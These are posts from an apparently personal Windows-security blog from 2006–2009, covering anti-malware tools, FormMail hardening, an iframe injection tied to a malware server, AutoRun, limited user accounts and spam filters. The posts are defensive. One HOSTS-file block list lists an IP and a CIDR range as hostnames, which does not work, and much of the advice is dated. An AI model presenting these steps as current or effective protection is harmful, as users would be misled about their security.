Once downloaded you should install the program onto your hard drive. There are installation options to watch for and the options you select will affect the normal operation of the program, when launched. One of the installation options is for the "TeaTimer" module. This is a realtime monitoring component that sits in your System Tray and launches itself into action whenever a change is about to be made to the system, the Registry, or your browser's home or search page. The program pops up little balloon alerts asking if you want to allow or deny the changes, or even notifying you that a suspicious program file was terminated automatically. These balloon popups can be annoying at times, although you can tell TeaTimer to remember your decisions. Unfortunately, there have been several serious false positives reported in the Spybot forums concerning the TeaTimer module deleting harmless files necessary for the operation of other programs or Windows itself. Lately, these false positives are becoming fewer and further between. It is your choice whether you want to use the TeaTimer module. I would keep Windows System Restore turned ON in case TeaTimer renders an important program, or part of Windows itself unusable (use the "Last known good configuration" startup option).

No matter which options you choose to install the program with, always select the option to update the program immediately. You can select or deselect all options later on, using the Advanced Mode. Once installed and updated it is time to Immunize, then scan for threats. These steps are described in my extended comments, along with download and forum links and more instructions about using Spybot Search and Destroy.

Continue reading "How to use Spybot Search & Destroy to fight malware" »

Posted by Wiz at 2:39 PM | Permalink

back to top ^

Takeaway

This is a technical article about securing a Perl "FormMail" script against spammers who attempt to hijack these scripts for use as spam relays. For those not in the know, FormMail, written in the "Perl" scripting language, is one of the original mailer scripts freely available for general use on websites. It is used by millions of webmasters to send email from a web page form. However, unbeknown to many webmasters, older versions of FormMail are totally insecure and can be exploited as spam relays.

History of FormMail

The original version of FormMail was written in 1995 by Matt Wright and was made available for free on his website: Matt's Script Archive. Unfortunately, the early versions of his FormMail script were very insecure and easily turned into spam relays. This fact was seized upon in 2002 by spammers who used bots to scour websites in search of these exploitable scripts, by name or variations thereof. In response, on April 19, 2002, Matt rewrote his FormMail script to secure it better and released it as version 1.91. This was to become the final version of Matt's FormMail. It remains mostly insecure to this day, yet is in use by website owners around the World who haven't learned about the exploits targeting FormMail.

Several years ago I wrote an in depth web article describing the vulnerabilities in Matt's FormMail, partially titled: FormMail Security Vulnerabilities and Solutions, in which I also recommended a drop in secure replacement script known as NMS FormMail, which was developed by a group of calling themselves the London Perl Mongers. My article is still a valuable resource and will bring most webmasters up to speed on what they need to do to protect their websites from FormMail exploiters. Following my recommendations will certainly help to secure any FormMail scripts you may be using. It will also protect your email account(s) from being harvested by creating alias numbers for them, in NMS FormMail, instead of using plain text addresses to submit to. But, there's more you can do that wasn't covered in my original article.

Securing FormMail - 101

One of my recommendations was renaming your FormMail script to something other than its default spelling: formmail.pl. While this makes it a little harder to locate the script for hostile bots it is useless at protecting it against human spammers. All they need to do is to read the source code of your contact, or feedback pages to get the name of the script that processes your forms and mails comments to you. Then they can go after that script by its new name to try to exploit it for use as a spam relay. If it really is an insecure version of Matt's FormMail it will be used as a spam relay! If you are running your website on an Apache web server, as most of us are, there are special codes, called Mod_Rewrite Directives, that can be applied to a particular server file named .htaccess to completely hide the name of the renamed script, protecting it from being used as a spam relay. If you are allowed to add these directives you can make your FormMail script invisible to spammers.

Read the rest of the details in my extended comments.

Continue reading "Securing FormMail scripts against spambots" »

Posted by Wiz at 2:15 AM | Permalink

back to top ^

Yesterday, April 30, 2009, when investigating a problem with an associate's websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in the Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.

The hostile iframe code was injected into the home pages of two related websites by exploiting vulnerabilities in a PHP script used by the webmaster of those websites. The server dispensing the exploits is located at 91.212.65.138, which coincides with the Eurohost home page. The CIDR assigned to Eurohost is 91.212.65.0/24 and you should block access to it in your firewall IP blocking rules, or in your Windows HOSTS file. Examples of how to do both are found below.

Any website that is running php or cgi scripts is in danger of becoming an inadvertent carrier of the redirection iframe that leads your innocent visitors to servers that are rigged to exploit a variety of exploitable vulnerabilities in their browsers, or browser add-ons, plug-ins, or helper objects. Some of the most frequently exploited applications are Internet Explorer (any version prior to 8.0), Adobe Flash, Adobe Reader and Apple Quicktime. Other exploited programs include Apple Safari, Google Chrome and occasionally, Mozilla Firefox. On rare occasions the Opera browser and the Java plug-in are vulnerable to targeted attacks. Firefox and Opera browsers are usually updated very quickly after a vulnerability is reported to their maintainers. Plug-ins usually take longer to update because they have to interact with so many other items and applications.

Webmasters and server administrators, you are responsible for keeping up to date with patches released by software authors, for any applications or scripts that you choose to run on your websites. Information to help you protect your websites and servers from getting exploited by hostile injection probes is in my extended comments.

Individuals browsing the Internet are the real targets of all of these injection attacks. This includes everybody reading this article. You and I have to constantly remain vigilant about threats to our computers' security. New exploits are found every month and are often released in the wild before software authors can respond with patched versions. Those are called zero day exploits. There are several ways to protect your computers from these exploits, including, but not limited to keeping up to date with all Windows, Mac or Linux updates and patches, and patches for commonly exploited third party browser add-ons, like Flash players, PDF Readers, Quicktime and Java plug-ins. Your next line of defense is a combination of security programs encompassing a 2-way firewall, anti-virus and anti-spyware and web threat protection that blocks hostile web pages. Or, you can install one top-notch security suite, like Trend Micro Internet Security and have all these protections and more in just one regularly updated package. There are links to reputable security products in the right sidebar on all of my blog pages.

Windows users have an additional means of protecting their PCs from visiting hostile websites. There is a special file, normally found in (C):\Windows\System32\Etc\, with the unusual file name: HOSTS . Although it has no file extension it can be opened and edited using the built-in Windows Notepad. The HOSTS file takes input in the form of IP addresses and website URLs, separated by a tab or multiple spaces. To protect your computer from being redirected to the hostile tojandglow website, or the Ukrainian server it tries to redirect you to, open your HOSTS file and edit it using these steps.

1. Using Start > (My) Compute, double-click on the C drive icon, then navigate to your Windows\System32\etc\ folder.


2. Inside the "etc" folder you should see a file named "Hosts" You may have to unhide system files before this file can be seen. See my extended comments for details on how to do this.


3. Right-click on the file named HOSTS and choose (left click) Properties


4. Find the attributes section starting with "READ-ONLY" and uncheck it if it was checked


5. Click Apply and OK to close the Properties window.


6. Right-click on HOSTS while holding down the Shift key and select "Open With"


7. Scroll through the programs list until you find "Notepad" and double-click on it


8. If Notepad isn't listed you will have to use the browse button to navigate to the Windows folder, where Notepad.exe is located.


9. With HOSTS open for editing go to the last line in the file and hit ENTER


10. Add these lines, with a tab after each 127.0.0.1:
    
    
    
    • 127.0.0.1       tojandglow.com
    
    
    • 127.0.0.1       91.212.65.138
    
    
    • 127.0.0.1       91.212.65.0/24
    
    


11. Click File > Save and in the File Type selection, choose All FIles and save it as HOSTS, without an extension.


12. Windows may decide to add a .txt extension anyway. If it does, allow this, then right-click on the saved file and delete the .txt extension. Answer the challenge about changing file extensions.

Reboot your computer to make this protection take effect. From that point on any script that tries to redirect you to any of the web addresses listed in the HOSTS file will instead be looped right back to your own computer, commonly referred to as 127.0.0.1, or Local Machine. The injected iframe would display a "page cannot be found" error if it was visible (it isn't; it's only 1x1 pixel!). Do the same anytime a new hostile website or ip address is published.

BTW: If you see any 127.0.0.1 entries referring to microsoft.com in your HOSTS file, remove them! Malware put them there to prevent you from getting Windows Updates or Microsoft security downloads. Ditto for any recognizable security vendors' websites.

Continue reading "Block Ukrainian Malware Server on Eurohost" »

Posted by Wiz at 5:10 PM | Permalink

back to top ^

Although I use Firefox as my primary (default) browser and web design test tool, I have kept the latest version of Opera browsers installed as well, just to make sure it renders my layouts correctly. Today, March 3, 2009, I received a security alert that Opera Software, of Norway, had released a security update to the Opera Browser. This was in response to a vulnerability reported on CERT, on March 3, 2009. The new version is number 9.64. Like I usually do, I downloaded the new version, ran the setup file as an Administrator (using Run As), from my XP Professional Power User account and upgraded from the previous version (9.63). When Opera opened everything looked fine and I closed it and went on about my business, working with html files I was editing.

Begin Rant:

I was about an hour later, still logged into my Power User account, that I went to the still open directory where these .html files live and double clicked on one, expecting it to open in Firefox, which is my default browser. Instead, to my surprise, it opened in Opera! I had not made any changes in the setup of Opera. I told the program to perform an Upgrade installation, just like the previous versions had been. None of them ever stole my default browser association and few even asked about being made the default browser. This is something new and as it turned out, slightly difficult and aggravating to resolve.

When I found that Firefox was not opening .html files any more I checked its options to see if it was still the "default browser;" which it claimed it was. Had it not been, I would have been able to make it so, using the Check Now button (Tools > Options > Advanced > System Defaults). But, Firefox thought it still was the default browser, so I tried disassociating .html files within Opera, but nothing changed. About that time I decided switch to my Administrator level account to uninstall Opera and see if it gave back the previous association to Firefox, but no luck. I went into Set Access and Defaults and reset Firefox as the Default browser, which worked in the Admin account, so I logged off it and back into the Power User account. Note, that you cannot change the Program Access and Defaults from a Power User account, only an Administrator level account, in XP.

Back in my Power User account I found that it now associated .html files with Windows Notepad! Every html file I double clicked on opened in Notepad, not Firefox! I decided to do an end run around the Windows File Association defense and right clicked on an html file, in the aforementioned folder, and chose Properties. The Properties sheet showed the html files opened with Notepad and offered a button to Change that. I used the button and chose Firefox to open .html files, clicked Apply and OK. When I tried opening an html file it still wanted to use Notepad, so I restarted the computer. This act alone cures a lot of mess-ups and it fixed this one.

The point of this article isn't just to show my readers how to recover from a browser file type association theft, but also to let Opera Software know that one of their users is pretty #@$%*~ off right now about having to go through all this work to keep a long ago established file type association that their update broke, without any word of warning. Also, it may be a long time before I reinstall an Opera Browser, which I was only using to test website layouts for compatibility anyway.

End Rant

Posted by Wiz at 5:21 PM | Permalink

back to top ^

According to a recent study by the BeyondTrust Corporation, titled "92 Percent of Critical Microsoft Vulnerabilities are Mitigated by Eliminating Admin Rights," most known and as yet unknown Windows exploit attacks will fail if the targeted PC is being operated with reduced user privileges. This means not running as an Administrator.

BeyondTrust's findings show that among the 2008 Microsoft vulnerabilities given a "critical" severity rating, 92 percent shared the same best practice advice from Microsoft to mitigate the vulnerability: "Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights." This language, found in the "Mitigating Factors" portion of Microsoft's security bulletins, also appears as a recommendation for reducing the threat from nearly 70 percent of all vulnerabilities reported in 2008.

As far back as May, 2007, I have published blog articles professing the added security to be gained by operating a PC with reduced user privileges. Furthermore, I published a web page titled: User Account Privileges Explained, describing the differences between the various types of user accounts available in Windows 2000 and XP. That page also contains instructions for elevating reduced user privileges by using the Windows "Run as" right-click option, when installing, or launching a program that was built with the assumption that a member of the Administrators Group would be running it.

Some of the benefits derived by reducing your user privileges for your daily browsing account may include the following:

• Most viruses cannot be installed


• Most spyware cannot be installed


• Most adware cannot be installed or survive a reboot


• Browser BHOs that hijack your home page and search may not be fully installed, or survive a reboot


• Rootkits cannot be installed


• Mistakes you make by visiting compromised websites will probably fail to cause any damage


• Botnet executables cannot take control of your computer


• Fake anti virus or anti spyware popup alerts will not be installed, or survive a reboot


• System Restore, Windows Defender, the Windows Firewall and Automatic Windows Updates cannot be disabled


• Your HOSTS file cannot be poisoned


• Worms, like the Conficker Worm cannot be installed, even via AutoPlay/AutoRun exploits


• Changes cannot be made to the HKLM branch of the Windows Registry


• Some programs cannot be installed, unless you use "Run as"


• Files cannot be saved to, deleted from, or overwritten with fake copies, in the Windows and System32 directories and sub-directories

To achieve all of the above protection one should change their daily browsing account type from "Computer Administrator" to "User" or "Limited User." If you are using a computer with a "Business" or "Professional" version of Windows you can run as a "Standard User" (Windows Vista and Windows 7), or "Power User" (Windows 2000 and XP), depending on your operating system. The benefits also presume that the owner or user is not tricked into installing the malware by using the "Run as (Administrator)" command. If you download a Trojan Horse program that you think is something useful and it turns out to be malware in disguise, you can infect the computer by Running it as an/the Administrator. Common sense and a high level of suspicion, along with a judicious amount of Googling about unrecognized programs, before installing them, can save your butt.

Continue reading "Running a PC with reduced user privileges stops 92% of malware" »

Posted by Wiz at 7:34 PM | Permalink

back to top ^

Takeaway:
This article about (disabling) AutoPlay was supposed to be a sub-section in another article that I am composing about the Conficker/Downadup Worm, but in light of fresh information it has been promoted into its own article. If you already understand how AutoRun works skip down to the "Solution" section, in my extended comments.

AutoPlay is a long time feature included in all Windows operating systems from Windows 95 onward. It allows both data, video and music CDs and DVDs to start automatically when a pre-recorded disk is inserted into the player tray and the tray door is closed, which is a convenience for most users. With Windows XP onward when you insert a blank recordable disk into a media recorder a box will popup asking what you want to do. This is familiar stuff by now.

When you plug in a USB thumbdrive, camera memory module, external USB drive, Firewire disk, or map a network drive, one of two things usually happens. Normally, a box pops up asking what action you wish to take, with a default action highlighted. Most people usually choose to open these drives in a folder view and often select the option to remember that decision and not ask again. If they have selected that option the next time they plug in such a drive or module the device will automatically open as expected, without prompting.

When an external drive or device is plugged into your Windows PC and AutoPlay is on (which it usually is), a normally hidden file named Autorun.inf, in the root of that drive, can cause a program on the device to execute immediately. This is how setup programs run automatically when you insert a program installation disk. These Autorun.inf files are usually very small files, contain just a few lines of code, pointing to the setup executable, and are viewable in Notepad.

However, malware authors have begun exploiting this feature to spread their viruses and hostile programs to computers via removable drives and memory sticks, using the hidden AutoRun.inf to automatically run the Conficker/Downadup Worm's installation routine. This happens the moment that the device is plugged into an unpatched PC. This is one of the ways this Worm spreads in multi-computer environments. If an employee acquires the Conficker Worm while out of the office and then saves work documents to a thumbdrive, then plugs that drive into his or her work computer, the Worm can infect that computer, then attempt to infect the entire LAN!

To protect networks and standalone computers from becoming infected via removable drives that are infected various sources have recommended disabling the AutoPlay feature. Microsoft has entire pages devoted to this trick. Also, I have read details about fine tuning your AutoPlay restrictions so they only apply to removable drives, not CDs and DVDs. This all sounded like a good preventative measure until today, when I read Technical Cyber Security Alert TA09-020A, on the US-CERT website. That bulletin makes it clear that simply disabling AutoPlay via Group Policy or the recommended Registry hacks would NOT prevent infections via removable devices. This is because these hacks and workarounds do not address the problem that Autorun.inf is still parsed for instructions, which are then executed automatically, even if AutoPlay is turned completely OFF!

From the CERT bulletin:

The Autorun and NoDriveTypeAutorun registry values are both ineffective for fully disabling AutoRun capabilities on Microsoft Windows systems. Setting the Autorun registry value to 0 will not prevent newly connected devices from automatically running code specified in the Autorun.inf file.

By placing an Autorun.inf file on a device, an attacker may be able to automatically execute arbitrary code when the device is connected to a Windows system. Code execution may also take place when the user attempts to browse to the software location with Windows Explorer.

Read my extended comments for solutions to this vulnerability.

Continue reading "How to effectively disable AutoRun-AutoPlay in Windows computers" »

Posted by Wiz at 11:29 AM | Permalink

back to top ^

On July 24, 2006, I wrote a technical article on my Blog titled: "Using Windows Task Scheduler to Check for/install AVG-Free Anti Virus Updates." It described a simple method end users can apply to cause the AVG Free 7.5 Updater file to run every hour, instead of just once a day.

Now it is the summer of 2008 and AVG Free is at version 8.0, with version 7.5 set for discontinuation on December 31, 2008. The AVG Free updater still only checks once per day, but the command that worked in the previous version also works in version 8.0, with some path and file name adjustments. (AVG paid versions do allow multiple daily updates and scans).

If you use AVG Free 8.x and want to have it check for updates on an hourly basis (or some other personal schedule), the information that follows will guide you through the process. I am writing this using Windows XP Professional, so these details may be different if you use Windows Vista.

You can find information about the new Task Scheduler for Windows Vista here (Microsoft MSDN), or at LifeHacker.com (lots of screen shots - JavaScript required).

First, open the Task Scheduler by clicking on Start > (All) Programs > Accessories > System Tools - and clicking on Scheduled Tasks. Double-click on the icon labeled "Add Scheduled Task." The Scheduled Task Wizard will open. Click Next. A list of installed programs will appear with a scroll bar on the right. Scroll down to see if AVG Free 8.0 (or such) is listed and highlight it if it is, then click Next. If AVG Free 8.0 (or 8.x) is not listed use the Browse button to locate it. The path to the updater executable should be: C:\Program Files\AVG\AVG8\avgupd.exe, with a default installation. If you have customized your installation your path or folder name may vary, but the file name is constant.

Once you locate the AVG updater executable, "avgupd.exe," highlight it and click Next. Type a name for this task in the top input field. I used "AVG 8 Updater." Select the "radio" option "Daily" and click Next. Select a start time and day, making sure you also select "Every Day," or "Weekdays," depending on your requirements (home or office).Click Next. Enter a User Name and Password, if you have one assigned to your logged in identity, then click Next. If you want to fine tune your options for the updater task check the box beside "Open advanced properties for this task when i click finish."

The Advanced Properties page is where you enable or disable the task, change the schedule, manage the power settings, and decide if you want to wake your computer to run the task.

Here are the settings I used in my AVG Free 8.0 Updater scheduled task:

Task tab
Task: AVG 8 Updater
Start in: "C:\Program Files\AVG\AVG8"
Run: "C:\Program Files\AVG\AVG8\avgupd.exe" /SCHED=

Schedule tab
Schedule Task: Daily - (set a start time) - (AM/PM)
Schedule Task Daily: Every 1 day
Advanced button on Schedule Task
Check mark in "Repeat Task"
Every: 1 hours
Duration: 24 hours

Settings tab
Scheduled Task Completed: Stop the task if it runs for: 1 hour
Power Management: Check box for "Wake the computer to run this task" (NOT recommended for hourly tasks)

Make any other setting changes you want, then click Apply, then OK.

Also, under the Security tab, make sure that your logged in identity is allowed to run the task, if you are not an Administrator. If you run Windows 2000 or XP Professional you can make your daily browsing account a Power User and add yourself to the Backup Operators Group. This allows you to schedule and run backups and other tasks.

You can learn about protecting your Windows PC by running as a reduced privileges user, on my Blog article: Limited User Privileges Protect PCs From Adware, Rootkits, Spyware and Viruses, or on my FAQs page titled: Windows 2000 and XP User Account Privileges Explained.

Posted by Wiz at 2:06 PM | Permalink

back to top ^

I began experiencing problems Monday night (June 9), after using Acronis True Image 11 to restore my Windows XP Professional SP3 computer, after an experiment trying to convert my setup from single SATA to SATA RAID failed miserably. Lesson #1: If the OS is already installed and you were thinking about converting the boot system to RAID, FORGET IT!

After I finally forced my boot drive out of being labeled as a dynamic RAID disk I was able to load a saved image onto it and boot back into Windows XP (SP3), after 13+ hours of downtime. More on how I did this in my extended comments section.

Anyway, once I finally got back into Windows I left the computer alone for a while and did other things. When I came back to check for new email and see if my scheduled Windows and Acronis backup tasks were running all I saw was a hideous BSOD, with a Stop Error labeled: "BAD_POOL_HEADER," followed by these machine debug codes: STOP: 0x00000019, 0xE106F3F8, 0xE106F418, 0x0C040401. At first I thought this was a simple glitch, but I found out it wasn't, later on. My solution is further down this article.

While I was trying over and over to restore my saved image, using the Acronis Recovery CD, to one of the 250 Gb hard drives that I mucked by by initializing RAID, I noticed that my external USB drive was not listed as an accessible location for restoring a backup image, even though it was connected and turned on. I had images on both an internal and external hard drive, with the most recent being on the USB drive. So, I got out of Acronis and tried booting from my Ubuntu Hardy Heron (8.04) live CD. My intention was to copy the newer image from the USB disk to the internal backup disk. When I got into the Linux desktop and opened "Computer" I saw both the internal and external disks, with their correct disk labels, but was unable to "mount" (open) either of them! The error message pop-up contained the following information (my interpretation, not verbatim):

This disk cannot be mounted because it is marked as being in use by Windows. This is sometimes caused by improperly removing a connected device without first ejecting it using the "Safely Remove Hardware Wizard."

This started me thinking about how the last time I used the external USB drive, when I was done saving an image to it I reached behind it and flipped the power switch off, instead of "safely stopping and removing" it. Lesson number two: always use the Safely Remove Hardware utility to stop/eject your USB devices!

So, here I was, back in Windows again, with the USB drive turned on and fully visible through My Computer. I dutifully went to the System Tray and right-clicked on the Safely Remove Hardware icon, to do it the right way, and was greeted by another cryptic pop-up error message, saying:

"An exception occurred while trying to run "Shell32.dll, Control_RunDLL hotplug.dll."

A Google search for that exception brought me to this page on the Acronis True Image Forum (reply #69), at Wilderssecurity.com. The cause of the hotplug.dll failure was an invisibly corrupted registry entry for each of the volumes labeled as a "Generic Volume." Apparently, when these disks were restored by Acronis True Image their registry entries were not "NULL Terminated," and one had the letter H appended to it's description, in Device Manager > (View Hidden Devices option selected) > Storage Volumes >> Generic Volume. To fix the problem all I had to do was right click on each generic volume and select Update Driver. After all of these disks were "updated" I rebooted and the exception in hotplug.dll was gone.

How I fixed the BSOD Stop Error BAD_POOL_HEADER
In the beginning of this article I told you about getting a BSOD whenever a scheduled Windows Backup requiring "shadow copy" was initiated (save System State). I narrowed this down to only a System State backup causing the Stop Error. The solution was similar to the hotplug issue, but, instead of "Updating" the driver for each Generic Volume, I "Uninstalled" each of them, then rebooted twice. After the second reboot they were fully re-detected and ready to use and the hotplug problem was also gone. This is probably the best way to fix these problems.

Continue reading "Disk problems after restoring an image and how I solved them." »

Posted by Wiz at 2:16 AM | Permalink

back to top ^

In Today's World the Internet is no longer a safe place for Windows PC users (not that it ever was). Criminals are exploiting vulnerabilities in web sites, web servers, email, browsers, and unsecured, or under-secured Windows OS computers.

Some of the current exploits making the rounds are using JavaScript functions to install malware onto vulnerable Windows based PCs. Some of these exploits are being secretly installed into the operating system of web servers, thus causing the exploit code to appear on every web site hosted on that server (a horrible situation). The individual web site customers are at the mercy of their hosting company to detect and repair the rootkit infection that adds the exploit codes to every home page on that server. Web hosts are usually informed about such exploits in the wild, that target their operating systems and they usually apply the necessary patches and re-compile the Apache Kernel, or Windows Server OS, as soon as possible.

Another related attack vector comes from individual web sites, if they are using insecure scripts, for which various hackers are searching. Hackers send bots to probe every website they can find, following links in search results, and on websites they have already visited. The bots are programmed to attempt to run various types of exploits against that website. The exploit attempts I see most often involve trying to exploit PHP scripts, or web pages, to perform http redirects to hostile scripts, hosted on other servers. A website owner who is not fully up to speed about security issues may install a vulnerable script, or copy insecure code from an open source project, only to have his website used a a redirector to hostile codes.

Finally, there are JavaScript exploits being used on the web pages hosted unknowingly, on Windows computers that have been taken over by the Storm Trojan. When people are enticed to visit those web pages the JavaScript routines will attempt to download and run hostile code against them, which if successful will add their computer to this ever-growing BotNet. See my recent blog post about the Storm Botnet, or search my blog for the phrase "Storm Trojan."

Here are 10 steps that PC users can take to protect their computers from all JavaScript exploits.

1. Apply all available Windows/Microsoft Updates, including Office product patches. This is a MUST DO.


2. If you have not updated your copy of Internet Explorer to version 7, do so now, then use Windows Updates to apply all released patches for it. IE 7 has built-in security features that simply cannot be applied to previous versions of that browser.


3. Set your Internet Explorer security level to medium high, or high. This will cause prompts to appear when scripts are asking for permission to run, which will be on almost every website you visit. This will drive you crazy, but at least give you a fighting chance.


4. Turn on the anti-phishing filter in IE 7.


5. To avoid the craziness that goes with securing Internet "Exploder," download and install the latest version of the Firefox browser, make it your default browser for browsing the Internet. Firefox does not run ActiveX controls at all and does not allow stealth downloads or installs. Every add-on or download must be manually approved. Set the options in Firefox to automatically check for updates to both the browser and any add-ons you've installed.


6. Install the No-Script add-on for Firefox, which blocks all known JavaScript and iFrame exploits, if you configure it properly. No-Script blocks JavaScript functions on websites, by default, but allows you to override it selectively, for sites you trust.


7. If you are uncommitted regarding an Internet Security product, try Trend Micro PC-cillin Internet Security 2008. It has resident shields that will intercept hostile scripts embedded in web pages, before they are downloaded to your browser. It also removes viruses, rootkits and spyware.


8. If you are currently operating as the Computer Administrator you should consider reducing your exposure to malware by changing to a Limited User account. This is not a trivial matter, but offers tremendous protection against accidental infections. I have also posted an article on my blog explaining how running with reduced privileges can protect you online.


9. If you are on broadband Internet make sure that you have a NAT (Network Address Translation) router between the modem and your computer. NAT routers hide your computers from incoming TCP/IP and UDP probes by malicious scripts and infected computers. Some modems have built-in NAT router sections, but some don't. A straight connection from a broadband modem to a PC can make it vulnerable to scripted attacks aimed at your TCP ports. A software firewall is a must for PC owners. Windows XP and contains a built-in one way (incoming) firewall, while Vista has a two way firewall (in and out).


10. Scan for acquired malware threats often, using up-to-date applications and definitions.

By applying these 10 steps you will have secured your PC as much as possible, while still allowing it to function on the Internet. The advise about running with reduced user privileges has been officially applied by Microsoft, to their Windows Vista operating system. Vista users normally operate with reduced privileges, unless administrator overrides are required to install, or uninstall a program or driver. It is still up to the user to determine if this is safe or not.

In the end, it is always up to the computer owner to decide what level of security they can tolerate, and what programs or add-ons they will allow to be installed onto their computers. If the user is duped by a cleverly worded spam email message, into clicking on a hostile link, no security warnings known to man will prevent them from installing what might turn out to be a Trojan horse application. It happens every day! Be vigilant and practice safe Hex!

Posted by Wiz at 3:22 PM | Permalink

back to top ^

Back in the days of Windows 95 I bought a program called PowerQuest Drive Image. Drive Image allowed me to take snapshots of my entire hard drive and save them to other hard drives, to be used to recover a failed master hard disk. Drive Image contained a fabulous utility named Magic Mover, which allowed me to move entire programs, with all of their settings and distributed system files, from one PC, or partition, to another. Unfortunately, Powerquest is no more, along with Magic Mover.

While answering questions on a computers section of a specialty forum, where I act as moderator, a member asked questions about moving programs, settings and preferences from his XP computer to his new Vista computer. Another member pointed him to the Windows Vista "Easy Transfer" utility, which can "move" a number of programs, which it knows about, from an XP computer to the Vista computer, over a cable or network connection.

Unfortunately, the original poster had programs he wanted moved, but are not listed in the Easy Transfer database. That's when another member mentioned a program by LapLink, called PCMover. This program can indeed move any or all of your programs, files, settings, or desktops, between two computers running Windows 95, 98, NT, Me, 2000, Media Center, XP, or Vista. Instead of taking one or more days to migrate all of your programs and settings, you can do this with PCMover in a few hours, or less.

PCmover can migrate your PC across a network, Laplink USB cable, Laplink parallel cable, Windows Easy Transfer Cable, or any type of removable media that can be read by both PCs. If your computer has multiple users, PCmover gives you the option to migrate some or all of the users at once. The security information about file ownership and access control is preserved for each user. You can even use PCmover to migrate your PC to an Intel-based Mac!

A single license of PCmover ($49.95) allows you to migrate from a single old (source) PC to a single new (destination) PC. Additional migrations require the purchase of additional licenses. For most end users this is not a problem, since they rarely have to perform such major transfers of programs. There is significant discount pricing available from LapLink, for people or businesses requiring multiple computer migrations, in 5 or 10 packs of migration licenses. Upon payment of a migration fee, the software transfers files and settings from your old computer to your new computer.

You can read more about PCMover - here.

Posted by Wiz at 12:53 AM | Permalink

back to top ^

By now most of you have seen hundreds of "Postcard" email scams in your inboxes and are getting tired of hitting the delete button (hopefully you are deleting them!). These messages have subjects containing phrases implying that a Friend, or Class-Mate or "Worshipper" (etc) has sent you a postcard, or ecard, or greeting postcard, etc. They all contain false details about an alleged e-card that is waiting for you if you click on the link supplied, usually with a numeric IP, followed a forward slash, a question mark, then a bunch of random characters, leading to a compromised PC hosting a web page containing hostile JavaScript to redirect you to a website that has the Storm Worm infector. Anybody who is foolish enough to click on that link, in a Windows PC, or Windows powered hand-held device, will probably be infected with the Storm Worm, or a variant thereof, and their PC will become a spam relay in a BotNet.

If you use MailWasher Pro to screen your incoming email I have an automatic solution for detecting and deleting these, and most other spam messages in the wild; my custom MailWasher filter rules targeting current types of spam. MailWasher Pro uses a text file called filters.txt to list custom conditions for identifying and acting against spam that matches the statements in these user configurable rules. A default installation produces a very basic filters.txt file, which is waiting for you to add your own custom rules to it.

If you don't know how to create your own MailWasher filters, visit my MailWasher Pro Filters page, where you will find my own list of custom filters for use with the MailWasher Pro email program. The filters will load into an iframe in the middle of the page (No, this is not an exploit, just an HTML inline frame with visible contents). There is a large set and a smaller set of filters. I use the smaller set which is targeted at the most recent varieties of spam in the wild. The large set includes the new rules plus anti-spam rules going back about 5 years.

To use my filters in your MailWasher application you should first copy the contents of the set you prefer to use (click inside iframe, press Control + A, press Control + C), or right-click on one of the file links on the web page and save it as "filters.txt" on your desktop. With MailWasher open click on Help > "About" which will open a box with the version and copyright details. At the bottom of this box there is a link to your personal profile data folder for MailWasher Pro. Click on the link at the bottom of the About box to open the MailWasherPro Application Data folder in a window, then close MailWasher. You must close MailWasher before editing filters.txt, otherwise your changes will be overwritten by the program. The only time you can work on filters with MailWasher open is if you use the Filters utility from within the program, to create or edit rules.

There will be a file named filters.txt in your MailWasher Pro application data folder. You will either overwrite it's contents, or add to them, depending on if you have created any of your own filter rules. If you haven't created your own filters and you downloaded one of my filters files and saved it as "filters.txt" just drag it from your desktop into the MailWasher Pro data folder and drop it there, allowing it to overwrite the existing copy.

If you chose to copy the contents in the iframe for pasting into the program's filters.txt, open filters.txt in NotePad, in the "MailWasherPro" Application Data folder. If you are going to add my filters to your existing rules choose a line where you want them to start (the beginning is a great place), click on the beginning of that line and press Control + V, to paste them in at that point. If you are going to overwrite the existing filters entirely click inside it and press Control + A (Select All), to highlight all of the contents, then press Control + V to paste my filter rules into the document, overwriting the contents, then save the changes (Alt > F > S). Make sure you don't have any blank lines between rules and that each rule begins on a new line. Turn off Word Wrap. Instructions are typed in the top comments of my rules.

After you have pasted in the new rules, close filters.txt, then open MailWasher Pro. My filters should now be loaded into the program and will delete most current incoming spam, either automatically, or manually. Use Control + F7 to display or hide the filter sidebar, in the program interface. Watch for spam messages that are hidden by some rules, which you must delete manually, by clicking on Process Mail (F6), on top of MailWasher Pro. Make it a practice to click on the Process Mail button every hour, whether there is anything marked for deletion or not. This frees up RAM and removes temporary data files created while the program is running. It will also delete hidden spam messages.

I update my rules very frequently, sometimes more than once on the same date. I post the last updated date in the comments of the filters, in the top of the files. Comments begin with //. Be sure you bookmark my MWP filters page and check it often for new or altered filters. There is a link under the iframe to sign up for alerts from ChangeDetection.com whenever it detects a new date stamp on the page.

Wizcrafts Custom MailWasher Pro Filters are discussed on the Firetrust MailWasher forum, where I post notices about filter updates and where other MailWasher users provide input about them.

Posted by Wiz at 11:50 PM | Permalink

back to top ^

For those you don't know, MailWasher Pro is a renowned email screening, spam detection/deletion program, designed for people who use a POP3 email client to send and receive their email (Outlook, Outlook Express, Windows Mail, Thunderbird, Eudora, etc). It can be set to automatically check all of your POP3 email accounts at any whole-minutes interval you choose and contains built-in tools to detect spam messages and viruses, then deal with them in the manner you define. MailWasher Pro uses a variety of spam detection techniques including a Bayesian learning filter (with user overrides), configurable blacklists and whitelists, a database of known/reported spam, domain name server (DNS) blocklists, and user configurable custom filter rules to block various types of spam, or other unwanted email. Once incoming spam has been deleted from your email servers you can download legitimate messages to your email program, which should be set to manual mode when used with MailWasher as the front-end screener.

The custom filters are very powerful tools that many people don't fully understand, hence they often go unused by less technical users. Fortunately for them, I am part of a group of technically advanced MailWasher Pro users who have learned to develop and use these custom spam filters. In fact I am the author of many of the filters now in common use by MailWasher Pro users around the World.

